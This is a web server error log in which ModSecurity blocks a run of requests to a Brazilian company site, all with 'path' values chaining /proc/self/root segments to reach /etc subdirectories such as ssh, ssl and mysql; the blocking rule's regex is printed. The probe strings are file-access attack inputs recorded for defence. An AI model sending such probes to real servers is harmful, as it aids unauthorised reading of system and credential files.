[Mon Mar 16 08:14:16.047061 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.241.46:58370] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmCP9ocpUE4ed4uDzSggAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:17.151648 2026] [:error] [pid 10709:tid 140411590858496] [client 74.7.243.203:33748] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmCRXjF1vJNtV6CWrejAAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:18.325009 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:58374] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmCv9ocpUE4ed4uDzShAAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:18.462898 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.243.203:33760] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmCv9ocpUE4ed4uDzShQAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:19.587474 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.241.46:57674] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmC9SswJuvopo3lOhEwQAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:19.676977 2026] [:error] [pid 21533:tid 140411607643904] [client 74.7.243.203:33766] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmC3jZBu2q05ozVU842AAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:20.878549 2026] [:error] [pid 21533:tid 140411557287680] [client 74.7.241.46:57676] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmDHjZBu2q05ozVU842QAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:22.015826 2026] [:error] [pid 10709:tid 140411733534464] [client 74.7.241.46:57682] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmDhXjF1vJNtV6CWrejQAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:22.060471 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.243.203:46122] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmDnjZBu2q05ozVU842wAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:23.280472 2026] [:error] [pid 21946:tid 140411574073088] [client 74.7.241.46:57692] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmD3bQATo66fKoS7wuKAAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:23.342966 2026] [:error] [pid 11972:tid 140411708356352] [client 74.7.243.203:46124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmD5qj1wV0Si-OkefNCQAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:24.577636 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.241.46:57696] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmEJqj1wV0Si-OkefNCgAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:14:25.588770 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.243.203:46138] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmEZqj1wV0Si-OkefNDAAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:25.914185 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.241.46:57710] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmEbABkC4fWIHEf8HPaQAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:27.219701 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.241.46:57720] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmE7ABkC4fWIHEf8HPagAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:27.909655 2026] [:error] [pid 11972:tid 140411658000128] [client 74.7.243.203:46146] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmE5qj1wV0Si-OkefNDgAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:28.453122 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.241.46:52058] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmFP9ocpUE4ed4uDzShwAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:29.102996 2026] [:error] [pid 10709:tid 140411616036608] [client 74.7.241.46:52062] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmFRXjF1vJNtV6CWrekAAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:30.255654 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.243.203:46154] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmFrABkC4fWIHEf8HPbAAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:30.711319 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.241.46:52076] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmFo6lpbStxTqkSktRaAAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:32.226392 2026] [:error] [pid 21946:tid 140411716749056] [client 74.7.241.46:52086] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmGHbQATo66fKoS7wuLAAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:32.623018 2026] [:error] [pid 21946:tid 140411683178240] [client 74.7.243.203:38200] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmGHbQATo66fKoS7wuLQAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:33.810781 2026] [:error] [pid 21533:tid 140411741927168] [client 74.7.241.46:52094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmGXjZBu2q05ozVU843QAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
